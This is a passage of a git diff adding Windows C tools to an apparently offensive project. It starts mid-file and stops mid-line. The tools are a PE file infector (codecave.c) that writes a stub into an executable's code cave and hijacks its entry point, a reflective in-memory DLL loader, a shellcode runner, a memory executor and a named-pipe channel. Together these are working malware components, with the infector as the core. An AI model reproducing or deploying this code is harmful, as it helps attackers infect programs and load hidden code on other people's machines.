MEM_RESERVE, PAGE_READWRITE); + if (!vpointer) { + printf("VirtualAlloc..: %ld\n", GetLastError()); + } else { + printf("Ptr-alloc'd...: 0x%p\n", vpointer); + } +#else + printf("WARN..........: Ptr-alloc disabled ( missing macro `-D_MILLER_IMAGEBASE=[HEX-VALUE]` )\n"); +#endif + + + HANDLE h = NULL; + + if (!hasPathToDLL) { + SetDllDirectory(path); + printf("DLL-dir.......: %s\n", path); + printf("DLL-file......: %s\n", dllpath); + h = LoadLibrary(dllpath); + } else { + printf("DLL-file......: %s\n", path); + h = LoadLibrary(path); + } + + if (!h) { + printf("LoadLibrary...: %ld\n", GetLastError()); + } else { + printf("LoadLibrary...: %s\n", "SUCCESS"); + } + + printf("Library HANDLE: 0x%p\n", h); + return 0; +} diff --git a/source/tools/old/codecave.c b/source/tools/old/codecave.c new file mode 100644 index 0000000..e921932 --- /dev/null +++ b/source/tools/old/codecave.c @@ -0,0 +1,253 @@ +#include <windows.h> +#include <stdio.h> + +// fucking gcc wont let us use __declspec(naked) +// so we have to fudge around this with assembler hacks +void realStubStart(); +void realStubEnd(); + + +void StubStart() +{ + + __asm__( + ".intel_syntax noprefix\n" // att syntax sucks + ".globl _realStubStart\n" + "_realStubStart:\n\t" // _realStubStart is global --^ + + "pusha\n\t" // preserve our thread context + "call GetBasePointer\n" + "GetBasePointer:\n\t" + "pop ebp\n\t" + "sub ebp, offset GetBasePointer\n\t" // delta offset trick. Think relative... + + "push 0\n\t" + "lea eax, [ebp+szTitle]\n\t" + "push eax\n\t" + "lea eax, [ebp+szText]\n\t" + "push eax\n\t" + "push 0\n\t" + "mov eax, 0xCCCCCCCC\n\t" + "call eax\n\t" + + "popa\n\t" // restore our thread context + "push 0xCCCCCCCC\n\t" // push address of orignal entrypoint(place holder) + "ret\n" // retn used as jmp + + // i dont know about you but i like GCC;'s method of strings + // over MSVC :P + "szTitle: .string \"o hi\"\n" + "szText: .string \"infected by korupt\"\n" + + ".globl _realStubEnd\n" + "_realStubEnd:\n\t" + + ".att_syntax\n" // fix so the rest of gcc doesnt burp + ); +} + +// By Napalm +DWORD FileToVA(DWORD dwFileAddr, PIMAGE_NT_HEADERS pNtHeaders) +{ + WORD wSections; + PIMAGE_SECTION_HEADER lpSecHdr = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(IMAGE_NT_HEADERS)); + for (wSections = 0; wSections < pNtHeaders->FileHeader.NumberOfSections; wSections++) + { + if (dwFileAddr >= lpSecHdr->PointerToRawData) + { + if (dwFileAddr < (lpSecHdr->PointerToRawData + lpSecHdr->SizeOfRawData)) + { + dwFileAddr -= lpSecHdr->PointerToRawData; + dwFileAddr += (pNtHeaders->OptionalHeader.ImageBase + lpSecHdr->VirtualAddress); + return dwFileAddr; + } + } + + lpSecHdr++; + } + + return 0; +} + +int main(int argc, char* argv[]) +{ + PIMAGE_DOS_HEADER pDosHeader; + PIMAGE_NT_HEADERS pNtHeaders; + PIMAGE_SECTION_HEADER pSection, pSectionHeader; + HANDLE hFile, hFileMap; + HMODULE hUser32; + LPBYTE hMap; + + int i = 0, charcounter = 0; + DWORD oepRva = 0, oep = 0, fsize = 0, writeOffset = 0, oepOffset = 0, callOffset = 0; + unsigned char *stub; + + // work out stub size + DWORD start = (DWORD)realStubStart; + DWORD end = (DWORD)realStubEnd; + DWORD stubLength = (end - start); + + if (argc != 2) + { + printf("Usage: %s [file]\n", argv[0]); + return 0; + } + + // map file + hFile = CreateFile(argv[1], GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + printf("[-] Cannot open %s\n", argv[1]); + return 0; + } + + fsize = GetFileSize(hFile, 0); + if (!fsize) + { + printf("[-] Could not get files size\n"); + CloseHandle(hFile); + return 0; + } + + hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL); + if (!hFileMap) + { + printf("[-] CreateFileMapping failed\n"); + CloseHandle(hFile); + return 0; + } + + hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize); + if (!hMap) + { + printf("[-] MapViewOfFile failed\n"); + CloseHandle(hFileMap); + CloseHandle(hFile); + return 0; + } + + // check signatures + pDosHeader = (PIMAGE_DOS_HEADER)hMap; + if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) + { + printf("[-] DOS signature not found\n"); + goto cleanup; + } + + pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew); + if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE) + { + printf("[-] NT signature not found\n"); + goto cleanup; + } + + + // korupt you need to tdo this more often fuck argh + if (pNtHeaders->FileHeader.Machine != IMAGE_FILE_MACHINE_I386) + { + printf("[-] Not an i386 executable\n"); + goto cleanup; + } + + // get last section's header... + pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS)); + pSection = pSectionHeader; + pSection += (pNtHeaders->FileHeader.NumberOfSections - 1); + + // save entrypoint + oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint; + oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress); + + // locate free space + i = pSection->PointerToRawData; + for (; i != fsize; i++) + { + if ((BYTE)hMap[i] == 0x00) + { + if (charcounter++ == stubLength + 24) + { + printf("[+] Code cave located @ 0x%08X\n", i); + writeOffset = i; + } + } + else charcounter = 0; + } + + if (charcounter == 0 || writeOffset == 0) + { + printf("[-] Could not locate a big enough code cave\n"); + goto cleanup; + } + + writeOffset -= stubLength; + + stub = (unsigned char *)malloc(stubLength + 1); + if (!stub) + { + printf("[-] Error allocating sufficent memory for code\n"); + goto cleanup; + } + + // copy stub into a buffer + memcpy(stub, realStubStart, stubLength); + + // locate offsets of place holders in code + for (i = 0, charcounter = 0; i != stubLength; i++) + { + if (stub[i] == 0xCC) + { + charcounter++; + if (charcounter == 4 && callOffset == 0) + callOffset = i - 3; + else if (charcounter == 4 && oepOffset == 0) + oepOffset = i - 3; + } + else charcounter = 0; + } + + // check they're valid + if (oepOffset == 0 || callOffset == 0) + { + free(stub); + goto cleanup; + } + + hUser32 = LoadLibrary("User32.dll"); + if (!hUser32) + { + free(stub); + printf("[-] Could not load User32.dll"); + goto cleanup; + } + + // fill in place holders + *(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders->OptionalHeader.ImageBase); + *(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hUser32, "MessageBoxA")); + FreeLibrary(hUser32); + + // write stub + memcpy((PBYTE)hMap + writeOffset, stub, stubLength); + + // set entrypoint + pNtHeaders->OptionalHeader.AddressOfEntryPoint = + FileToVA(writeOffset, pNtHeaders) - pNtHeaders->OptionalHeader.ImageBase; + + // set section size + pSection->Misc.VirtualSize += stubLength; + pSection->Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE; + + // cleanup + printf("[+] Stub written!!\n[*] Cleaning up\n"); + free(stub); + +cleanup: + FlushViewOfFile(hMap, 0); + UnmapViewOfFile(hMap); + + SetFilePointer(hFile, fsize, NULL, FILE_BEGIN); + SetEndOfFile(hFile); + CloseHandle(hFileMap); + CloseHandle(hFile); + return 0; +} diff --git a/source/tools/old/loadlib.c b/source/tools/old/loadlib.c new file mode 100644 index 0000000..b2689ee --- /dev/null +++ b/source/tools/old/loadlib.c @@ -0,0 +1,397 @@ +#include <windows.h> +#include <string.h> + +#include "compat.h" + +#define MAKE_ORDINAL(val) (val & 0xffff) +#define ROUND(n, r) (((n + (r - 1)) / r) * r) + +#define GET_NT_HEADERS(module) ((IMAGE_NT_HEADERS *)((char *)module + ((IMAGE_DOS_HEADER *)module)->e_lfanew)) + +typedef BOOL (WINAPI *DllMainFunc)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); + +static void free_imp_by_range(void *module, + IMAGE_IMPORT_DESCRIPTOR *begining, + IMAGE_IMPORT_DESCRIPTOR *end); +void *get_proc_address(HMODULE module, const char *proc_name); + + +DWORD rva_to_raw(DWORD rva, IMAGE_NT_HEADERS *nt_headers) +{ + WORD nsections; + IMAGE_SECTION_HEADER *sec_hdr = (IMAGE_SECTION_HEADER *)((char *)nt_headers + sizeof(IMAGE_NT_HEADERS)); + + for (nsections = 0; nsections < nt_headers->FileHeader.NumberOfSections; nsections++) + { + if (rva >= sec_hdr->VirtualAddress && + rva < (sec_hdr->VirtualAddress + sec_hdr->Misc.VirtualSize)) + return sec_hdr->PointerToRawData + (rva - sec_hdr->VirtualAddress); + sec_hdr++; + } + return 0; +} + +static int is_pe(void *map) +{ + IMAGE_DOS_HEADER *dos_hdr; + IMAGE_NT_HEADERS *nt_hdrs; + + dos_hdr = (IMAGE_DOS_HEADER *)map; + if (dos_hdr->e_magic != IMAGE_DOS_SIGNATURE) + return 0; + nt_hdrs = (IMAGE_NT_HEADERS *)((char *)map + dos_hdr->e_lfanew); + return nt_hdrs->Signature == IMAGE_NT_SIGNATURE; +} + +static IMAGE_IMPORT_DESCRIPTOR *get_imp_desc(void *module) +{ + IMAGE_NT_HEADERS *nt_hdrs; + DWORD imp_desc_rva; + nt_hdrs = GET_NT_HEADERS(module); + if (!(imp_desc_rva = nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)) + return NULL; + return (IMAGE_IMPORT_DESCRIPTOR *)((char *)module + imp_desc_rva); +} + +static int load_imports(void *module) +{ + IMAGE_IMPORT_DESCRIPTOR *first_imp_desc, *imp_desc; + first_imp_desc = imp_desc = get_imp_desc(module); + /* FIX ME: is checking Name and Stamp enough? */ + for (; imp_desc->Name || imp_desc->TimeDateStamp; ++imp_desc) + { + IMAGE_THUNK_DATA *name_table, *address_table, *thunk; + char *dll_name; + HMODULE lib_module; + + dll_name = (char *)module + imp_desc->Name; + /* the reference count side effect is desired */ + if (!(lib_module = LoadLibraryA(dll_name))) + goto fail; + + name_table = (IMAGE_THUNK_DATA *)((char *)module + imp_desc->OriginalFirstThunk); + address_table = (IMAGE_THUNK_DATA *)((char *)module + imp_desc->FirstThunk); + + /* if there is no name table, use address table */ + thunk = imp_desc->OriginalFirstThunk ? name_table : address_table; + while (thunk->u1.AddressOfData) + { + unsigned char *func_name; + /* is ordinal? */ + if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) + func_name = (unsigned char *)MAKE_ORDINAL(thunk->u1.Ordinal); + else + func_name = ((IMAGE_IMPORT_BY_NAME *)((char *)module + thunk->u1.AddressOfData))->Name; + + address_table->u1.Function = (DWORD)get_proc_address(lib_module, (char *)func_name); + + thunk++; + address_table++; + } + } + return 1; + +fail: + /* free the modules we loaded till now */ + free_imp_by_range(module, first_imp_desc, imp_desc); + return 0; +} + +/* if end is NULL, then it will continue till there are no more modules to free */ +static void free_imp_by_range(void *module, + IMAGE_IMPORT_DESCRIPTOR *begining, + IMAGE_IMPORT_DESCRIPTOR *end) +{ + IMAGE_IMPORT_DESCRIPTOR *imp_desc; + imp_desc = begining; + for ( ; + (imp_desc->Name || imp_desc->TimeDateStamp) && (!end || imp_desc != end); + ++imp_desc) + { + char *dll_name; + HMODULE loaded_module; + + dll_name = (char *)module + imp_desc->Name; + if ((loaded_module = GetModuleHandleA(dll_name))) + FreeLibrary(loaded_module); + } +} + +static void free_imports(void *module) +{ + free_imp_by_range(module, get_imp_desc(module), NULL); +} + +static void fix_relocations(IMAGE_BASE_RELOCATION *base_reloc, DWORD dir_size, + void *new_imgbase, void *old_imgbase) +{ + IMAGE_BASE_RELOCATION *cur_reloc = base_reloc, *reloc_end; + DWORD delta = (char *)new_imgbase - (char *)old_imgbase; + + reloc_end = (IMAGE_BASE_RELOCATION *)((char *)base_reloc + dir_size); + /* FIX-ME: is checking virtualaddress for cur_reloc necessary? */ + while (cur_reloc < reloc_end && cur_reloc->VirtualAddress) + { + int count = (cur_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); + WORD *cur_entry = (WORD *)(cur_reloc + 1); + void *page_va = (void *)((char *)new_imgbase + cur_reloc->VirtualAddress); + + while (count--) + { + /* is valid x86 relocation? */ + if (*cur_entry >> 12 == IMAGE_REL_BASED_HIGHLOW) + *(DWORD *)((char *)page_va + (*cur_entry & 0x0fff)) += delta; + cur_entry++; + } + /* advance to the next reloc entry */ + cur_reloc = (IMAGE_BASE_RELOCATION *)((char *)cur_reloc + cur_reloc->SizeOfBlock); + } +} + +static void copy_headers(void *dest_pe, void *src_pe) +{ + IMAGE_NT_HEADERS *nt_hdrs; + nt_hdrs = GET_NT_HEADERS(src_pe); + memcpy(dest_pe, src_pe, nt_hdrs->OptionalHeader.SizeOfHeaders); +} + +static void copy_sections(void *dest_pe, void *src_pe) +{ + WORD i; + IMAGE_NT_HEADERS *nt_hdrs; + IMAGE_SECTION_HEADER *sec_hdr; + + nt_hdrs = GET_NT_HEADERS(src_pe); + sec_hdr = IMAGE_FIRST_SECTION(nt_hdrs); + for (i = 0; i < nt_hdrs->FileHeader.NumberOfSections; ++i, ++sec_hdr) + { + void *sec_dest; + size_t padding_size; + + sec_dest = (void *)((char *)dest_pe + sec_hdr->VirtualAddress); + /* copy the raw data from the mapped module */ + memcpy(sec_dest, + (void *)((char *)src_pe + sec_hdr->PointerToRawData), + sec_hdr->SizeOfRawData); + /* set the remaining part of the section with zeros */ + padding_size = ROUND(sec_hdr->Misc.VirtualSize, nt_hdrs->OptionalHeader.SectionAlignment) - sec_hdr->SizeOfRawData; + memset((void *)((char *)sec_dest + sec_hdr->SizeOfRawData), 0, padding_size); + } +} + +/* executable, readable, writable */ +static DWORD secp2vmemp[2][2][2] = +{ + { + /* not executable */ + {PAGE_NOACCESS, PAGE_WRITECOPY}, + {PAGE_READONLY, PAGE_READWRITE} + }, + { + /* executable */ + {PAGE_EXECUTE, PAGE_EXECUTE_WRITECOPY}, + {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE} + } +}; + +static DWORD secp_to_vmemp(DWORD secp) +{ + DWORD vmemp; + int executable, readable, writable; + + executable = (secp & IMAGE_SCN_MEM_EXECUTE) != 0; + readable = (secp & IMAGE_SCN_MEM_READ) != 0; + writable = (secp & IMAGE_SCN_MEM_WRITE) != 0; + vmemp = secp2vmemp[executable][readable][writable]; + if (secp & IMAGE_SCN_MEM_NOT_CACHED) + vmemp |= PAGE_NOCACHE; + return vmemp; +} + +static void protect_module_pages(void *module) +{ + IMAGE_NT_HEADERS *nt_hdrs; + IMAGE_SECTION_HEADER *sec_hdr; + DWORD old_prot, new_prot; + WORD i; + + nt_hdrs = GET_NT_HEADERS(module); + /* protect the PE headers */ + VirtualProtect(module, nt_hdrs->OptionalHeader.SizeOfHeaders, PAGE_READONLY, &old_prot); + + /* protect the image sections */ + sec_hdr = IMAGE_FIRST_SECTION(nt_hdrs); + for (i = 0; i < nt_hdrs->FileHeader.NumberOfSections; ++i, ++sec_hdr) + { + void *section; + section = (void *)((char *)module + sec_hdr->VirtualAddress); + /* free the section if it's marked as discardable */ + if (sec_hdr->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) + { + VirtualFree(section, sec_hdr->Misc.VirtualSize, MEM_DECOMMIT); + continue; + } + new_prot = secp_to_vmemp(sec_hdr->Characteristics); + VirtualProtect(section, + sec_hdr->Misc.VirtualSize, /* pages affected in the range are changed */ + new_prot, + &old_prot); + } +} + +/* loads dlls from memory +* returns the address of the loaded dll on successs, NULL on failure +*/ +HMODULE mem_load_library(void *module_map) +{ + IMAGE_NT_HEADERS *nt_hdrs; + HMODULE module; + DWORD image_base, ep_rva; + IMAGE_DATA_DIRECTORY *reloc_dir_entry; + int relocate, apis_loaded; + + relocate = apis_loaded = 0; + if (!is_pe(module_map)) + return NULL; + + nt_hdrs = (IMAGE_NT_HEADERS *)((char *)module_map + ((IMAGE_DOS_HEADER *)module_map)->e_lfanew); + reloc_dir_entry = &nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + + /* reserve memory for the module at image base if possible */ + image_base = nt_hdrs->OptionalHeader.ImageBase; + module = VirtualAlloc((void *)(image_base), nt_hdrs->OptionalHeader.SizeOfImage, + MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + /* image base taken ? */ + if (!module) + { + relocate = 1; + /* is module relocatable? */ + if (!reloc_dir_entry->VirtualAddress) + return NULL; + /* try to allocate it at an arbitrary address */ + module = VirtualAlloc(NULL, nt_hdrs->OptionalHeader.SizeOfImage, + MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + if (!module) + return NULL; + } + + copy_headers(module, module_map); + copy_sections(module, module_map); + if (!load_imports(module)) + goto fail; + apis_loaded = 1; + /* relocate the module if it isn't loaded at it's prefered address */ + if (relocate) + { + IMAGE_BASE_RELOCATION *base_reloc; + base_reloc = (IMAGE_BASE_RELOCATION *)((char *)module_map + rva_to_raw(reloc_dir_entry->VirtualAddress, nt_hdrs)); + fix_relocations(base_reloc, reloc_dir_entry->Size, module, (void *)image_base); + } + /* change the protection flags of the module pages */ + protect_module_pages(module); + /* call DLLMain if it has one */ + if ((ep_rva = nt_hdrs->OptionalHeader.AddressOfEntryPoint)) + { + DllMainFunc dll_main; + dll_main = (DllMainFunc)((char *)module + ep_rva); + if (!dll_main((HINSTANCE)module, DLL_PROCESS_ATTACH, NULL)) + goto fail; + } + + return module; + +fail: + if (apis_loaded) + free_imports(module); + VirtualFree(module, 0, MEM_RELEASE); + return NULL; +} + +void mem_free_library(HMODULE *module) +{ + IMAGE_NT_HEADERS *nt_hdrs; + + nt_hdrs = (IMAGE_NT_HEADERS *)((char *)module + ((IMAGE_DOS_HEADER *)module)->e_lfanew); + /* tell the module it's getting detached */ + if (nt_hdrs->OptionalHeader.AddressOfEntryPoint) + { + DllMainFunc dll_main; + + dll_main = (DllMainFunc)((char *)module + nt_hdrs->OptionalHeader.AddressOfEntryPoint); + dll_main((HINSTANCE)module, DLL_PROCESS_DETACH, NULL); + } + free_imports(module); + VirtualFree(module, 0, MEM_RELEASE); +} + +void *get_proc_address(HMODULE module, const char *proc_name) +{ + IMAGE_NT_HEADERS *nt_hdrs; + IMAGE_DATA_DIRECTORY *exp_entry; + IMAGE_EXPORT_DIRECTORY *exp_dir; + void **func_table; + WORD *ord_table; + char **name_table; + void *address; + + + nt_hdrs = GET_NT_HEADERS(module); + exp_entry = (IMAGE_DATA_DIRECTORY *)(&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]); + exp_dir = (IMAGE_EXPORT_DIRECTORY *)((char *)module + exp_entry->VirtualAddress); + + func_table = (void **)((char *)module + exp_dir->AddressOfFunctions); + ord_table = (WORD *)((char *)module + exp_dir->AddressOfNameOrdinals); + name_table = (char **)((char *)module + exp_dir->AddressOfNames); + + /* NULL is returned if nothing is found */ + address = NULL; + + + /* is ordinal? */ + if (((DWORD)proc_name >> 16) == 0) + { + WORD ordinal = LOWORD(proc_name); + DWORD ord_base = exp_dir->Base; + /* is valid ordinal? */ + if (ordinal < ord_base || ordinal > ord_base + exp_dir->NumberOfFunctions) + return NULL; + + /* taking ordinal base into consideration */ + address = (void *)((char *)module + (DWORD)func_table[ordinal - ord_base]); + } + else + { + DWORD i; + + /* import by name */ + for (i = 0; i < exp_dir->NumberOfNames; i++) + { + /* name table pointers are rvas */ + if (strcmp(proc_name, (char *)module + (DWORD)name_table[i]) == 0) + address = (void *)((char *)module + (DWORD)func_table[ord_table[i]]); + } + } + + /* is forwarded? */ + if ((char *)address >= (char *)exp_dir && + (char *)address < (char *)exp_dir + exp_entry->Size) + { + char *dll_name, *func_name; + HMODULE frwd_module; + + dll_name = strdup((char *)address); + if (!dll_name) + return NULL; + func_name = strchr(dll_name, '.'); + *func_name++ = 0; + + if ((frwd_module = GetModuleHandleA(dll_name))) + address = get_proc_address(frwd_module, func_name); + else + address = NULL; + + free(dll_name); + } + + return address; +} diff --git a/source/tools/old/shellcode.c b/source/tools/old/shellcode.c new file mode 100644 index 0000000..8e57a02 --- /dev/null +++ b/source/tools/old/shellcode.c @@ -0,0 +1,46 @@ + +#include <windows.h> + +volatile const char *ShellCode __asm__("ShellCode") = ("\x6A\x00\x52\x53\x6A\x00\x89\xCB\xFF\xD3\xC3"); +volatile const char *lol __asm__("lol") = "LOLDUDE"; +volatile const char *lol2 __asm__("lol2") = "O_O"; + +typedef void (*MsgBoxFunc)(char*); + + +void run_test_shellcode(void) +{ + volatile static MsgBoxFunc MsgBoxA __asm__("kurwa") __attribute__((unused)); + + MsgBoxA = (MsgBoxFunc) GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"); + /* execute code in .text AND .rdata segment */ + __asm__( + ".intel_syntax noprefix\n" + "mov ecx, kurwa\n\t" + "mov edx, [lol]\n\t" + "mov ebx, [lol2]\n\t" + "mov esi, ShellCode\n\t" + "call esi\n\t" + ".att_syntax\n" + ); + + /* execute code in .text segment ONLY */ + __asm__( + ".intel_syntax noprefix\n" + "mov ecx, kurwa\n\t" + "push 0x0\n\t" + "push [lol]\n\t" + "push [lol2]\n\t" + "push 0x0\n\t" + "mov ebx,ecx\n\t" + "call ebx\n\t" + ".att_syntax\n" + ); +} + +int main(int argc, char *argv[]) +{ + if (argc == 1) + run_test_shellcode(); + return 0; +} diff --git a/source/tools/pipe_client.c b/source/tools/pipe_client.c new file mode 100644 index 0000000..f00bc92 --- /dev/null +++ b/source/tools/pipe_client.c @@ -0,0 +1,83 @@ +#include <windows.h> +#include <stdio.h> + +#include "xor_strings.h" + +#define BUFSIZE 512 + +int main(int argc, char** argv) +{ + HANDLE hPipe; + LPSTR lpvMessage = "Default message from client."; + BOOL fSuccess = FALSE; + DWORD cbToWrite, cbWritten; + LPCSTR lpszPipename = MILLER_MSGPIPE; + + if(argc > 1) { + lpvMessage = argv[1]; + } + + // Try to open a named pipe; wait for it, if necessary. + while (1) { + hPipe = CreateFile( + lpszPipename, // pipe name + GENERIC_WRITE, + 0, // no sharing + NULL, // default security attributes + OPEN_EXISTING, // opens existing pipe + 0, // default attributes + NULL); // no template file + // Break if the pipe handle is valid. + if (hPipe != INVALID_HANDLE_VALUE) { + break; + } + // Exit if an error other than ERROR_PIPE_BUSY occurs. + if (GetLastError() != ERROR_PIPE_BUSY) { + printf("Could not open pipe. (ERROR: %lu)\n", GetLastError()); + return -1; + } + // All pipe instances are busy, so wait for 20 seconds. + if (!WaitNamedPipe(lpszPipename, 20000)) { + printf("Could not open pipe: 20 second wait timed out.\n"); + return -1; + } + } + + printf("Pipe opened: %s\n", lpszPipename); + // Send a message to the pipe server. + cbToWrite = (lstrlen(lpvMessage)+1)*sizeof(char); + + char line[1024]; + size_t sent = 0; + do { + printf("Sending %lu byte message: \"%s\"\n", cbToWrite, lpvMessage); + fSuccess = WriteFile( + hPipe, // pipe handle + lpvMessage, // message + cbToWrite, // message length + &cbWritten, // bytes written + NULL); // not overlapped + if (!fSuccess) { + printf("WriteFile to pipe failed. (ERROR: %lu)\n", GetLastError()); + return -1; + } + sent++; + if (argc == 1) { + memset(&line[0], '\0', sizeof(line)); + printf("Input: "); + if (fgets(line, sizeof(line), stdin) == NULL) { + break; + } + lpvMessage = &line[0]; + cbToWrite = strnlen(lpvMessage, sizeof(line)); + if (lpvMessage[cbToWrite-1] == '\n') { + lpvMessage[cbToWrite-1] = '\0'; + cbToWrite--; + } + } else break; + } while (1); + + printf("%u messages sent to server\n", sent); + CloseHandle(hPipe); + return 0; +} diff --git a/source/tools/pipe_server.c b/source/tools/pipe_server.c new file mode 100644 index 0000000..d26006b --- /dev/null +++ b/source/tools/pipe_server.c @@ -0,0 +1,164 @@ +#include <windows.h> +#include <stdio.h> + +#include "xor_strings.h" + +#define BUFSIZE 512 + +static DWORD WINAPI InstanceThread(LPVOID); +static void AppOutput(LPSTR fmt, ...); + +int main(int argc, char** argv) +{ + BOOL fConnected = FALSE; + DWORD dwThreadId = 0; + HANDLE hPipe = INVALID_HANDLE_VALUE, hThread = NULL; + LPCSTR lpszPipename = MILLER_MSGPIPE; + + (void)argc; + (void)argv; + + // The main loop creates an instance of the named pipe and + // then waits for a client to connect to it. When the client + // connects, a thread is created to handle communications + // with that client, and this loop is free to wait for the + // next client connect request. It is an infinite loop. + + for (;;) { + AppOutput("Pipe Server: Main thread awaiting client connection on %s", lpszPipename); + hPipe = CreateNamedPipe( + lpszPipename, // pipe name + PIPE_ACCESS_DUPLEX, // read/write access + PIPE_TYPE_MESSAGE | // message type pipe + PIPE_READMODE_MESSAGE | // message-read mode + PIPE_WAIT, // blocking mode + PIPE_UNLIMITED_INSTANCES, // max. instances + BUFSIZE, // output buffer size + BUFSIZE, // input buffer size + 0, // client time-out + NULL); // default security attribute + if (hPipe == INVALID_HANDLE_VALUE) { + AppOutput("CreateNamedPipe failed (ERROR: %lu).", GetLastError()); + return -1; + } + // Wait for the client to connect; if it succeeds, + // the function returns a nonzero value. If the function + // returns zero, GetLastError returns ERROR_PIPE_CONNECTED. + fConnected = ConnectNamedPipe(hPipe, NULL) ? + TRUE : (GetLastError() == ERROR_PIPE_CONNECTED); + if (fConnected) { + AppOutput("Client connected, creating a processing thread."); + // Create a thread for this client. + hThread = CreateThread( + NULL, // no security attribute + 0, // default stack size + InstanceThread, // thread proc + (LPVOID) hPipe, // thread parameter + 0, // not suspended + &dwThreadId); // returns thread ID + + if (hThread == NULL) { + AppOutput("CreateThread failed (ERROR: %lu).", GetLastError()); + return -1; + } else CloseHandle(hThread); + } else { + // The client could not connect, so close the pipe. + CloseHandle(hPipe); + } + } + + return 0; +} + +DWORD WINAPI InstanceThread(LPVOID lpvParam) +// This routine is a thread processing function to read from and reply to a client +// via the open pipe connection passed from the main loop. Note this allows +// the main loop to continue executing, potentially creating more threads of +// of this procedure to run concurrently, depending on the number of incoming +// client connections. +{ + HANDLE hHeap = GetProcessHeap(); + char* pchRequest = (char*)HeapAlloc(hHeap, 0, BUFSIZE*sizeof(char)); + char* pchReply = (char*)HeapAlloc(hHeap, 0, BUFSIZE*sizeof(char)); + DWORD cbBytesRead = 0; + BOOL fSuccess = FALSE; + HANDLE hPipe = NULL; + + // Do some extra error checking since the app will keep running even if this + // thread fails. + if (lpvParam == NULL) { + AppOutput("ERROR - Pipe Server Failure"); + if (pchReply != NULL) HeapFree(hHeap, 0, pchReply); + if (pchRequest != NULL) HeapFree(hHeap, 0, pchRequest); + return (DWORD)-1; + } + if (pchRequest == NULL) { + AppOutput("ERROR - Pipe Server Failure"); + if (pchReply != NULL) HeapFree(hHeap, 0, pchReply); + return (DWORD)-1; + } + if (pchReply == NULL) { + AppOutput("ERROR - Pipe Server Failure"); + if (pchRequest != NULL) HeapFree(hHeap, 0, pchRequest); + return (DWORD)-1; + } + + // Print verbose messages. In production code, this should be for debugging only. + AppOutput("InstanceThread created, receiving and processing messages."); + // The thread's parameter is a handle to a pipe object instance. + hPipe = (HANDLE) lpvParam; + // Loop until done reading + while (1) { + // Read client requests from the pipe. This simplistic code only allows messages + // up to BUFSIZE characters in length. + fSuccess = ReadFile( + hPipe, // handle to pipe + pchRequest, // buffer to receive data + BUFSIZE*sizeof(char), // size of buffer + &cbBytesRead, // number of bytes read + NULL); // not overlapped I/O + + if (!fSuccess || cbBytesRead == 0) { + if (GetLastError() == ERROR_BROKEN_PIPE) { + AppOutput("InstanceThread: client disconnected (ERROR: %lu).", GetLastError()); + } else { + AppOutput("InstanceThread ReadFile failed (ERROR: %lu).", GetLastError()); + } + break; + } + // Process the incoming message. + AppOutput("--- MESSAGE ---"); + if (pchRequest[cbBytesRead-1] == '\n') { + pchRequest[cbBytesRead-1] = '\0'; + } + printf("\"%.*s\"\n", (int)cbBytesRead, pchRequest); + memset(pchRequest, '\0', BUFSIZE*sizeof(char)); + } + + // Flush the pipe to allow the client to read the pipe's contents + // before disconnecting. Then disconnect the pipe, and close the + // handle to this pipe instance. + FlushFileBuffers(hPipe); + DisconnectNamedPipe(hPipe); + CloseHandle(hPipe); + HeapFree(hHeap, 0, pchRequest); + HeapFree(hHeap, 0, pchReply); + AppOutput("InstanceThread exitting."); + return 1; +} + +static void AppOutput(LPSTR fmt, ...) +{ + char* pBuffer = NULL; + SYSTEMTIME stm; + GetSystemTime(&stm); + + va_list args = NULL; + va_start(args, fmt); + + vasprintf(&pBuffer, fmt, args); + printf("[%02d-%02d-%02d]: %s\n", stm.wHour, stm.wMinute, stm.wSecond, pBuffer); + free(pBuffer); + + va_end(args); +} diff --git a/source/tools/runbin.c b/source/tools/runbin.c new file mode 100644 index 0000000..af3b8f4 --- /dev/null +++ b/source/tools/runbin.c @@ -0,0 +1,217 @@ +/* modified (from http://securityxploded.com/memory-execution-of-executable.php) */ +#include <windows.h> + +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> + +#include "loader.h" + +#define DEREF_32( name )*(DWORD *)(name) + + +static volatile PVOID kernel32 asm("__kernel32") = NULL; +static volatile PVOID getproc asm("__getproc") = NULL; +static volatile DWORD EntryAddr asm("__EntryAddr"); +static volatile PVOID memalloc asm("__memalloc") = NULL; +static volatile PVOID ldr_ptr asm("__ldr") = NULL; + +static volatile struct loader_x86_data ldr; +static volatile DWORD size = 0x0; +static volatile PVOID vpointer = NULL; + +static volatile DWORD retval asm("__retval") = -1; + + +int main(int argc, char *argv[]) +{ + if (argc != 2 && argc != 3 && argc != 4) { + fprintf(stderr, "usage: %s path-to-dynamic-library [preferred-Virtual-Address] [wait-time]\n", 